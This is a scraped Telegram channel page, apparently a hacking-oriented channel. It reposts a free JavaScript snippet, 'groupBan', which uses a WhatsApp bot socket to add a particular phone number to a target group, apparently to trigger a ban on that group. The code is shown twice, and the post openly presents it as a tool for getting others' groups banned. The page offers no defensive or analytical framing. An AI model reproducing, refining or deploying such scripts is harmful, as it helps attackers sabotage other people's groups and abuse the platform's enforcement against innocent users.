VOID ELTINATOR [INFORMATION]
Open in Telegram
202
Subscribers
No data24 hours
-17 days
-1330 days
Posts Archive
if (!target.endsWith("@g.us")) throw "@g.us server required";
try {
await sock.groupParticipantsUpdate(target, ["13135550002@s.whatsapp.net"], "add")
} catch (e) {
throw e
}
}Repost from @vsp - #explanation.
🔗 ban group whatsapp code - ban whatsapp group - dont sell it bcs i share it for free - not work all group
async function groupBan(sock, target) {
if (!target.endsWith("@g.us")) throw "@g.us server required";
try {
await sock.groupParticipantsUpdate(target, ["13135550002@s.whatsapp.net"], "add")
} catch (e) {
throw e
}
}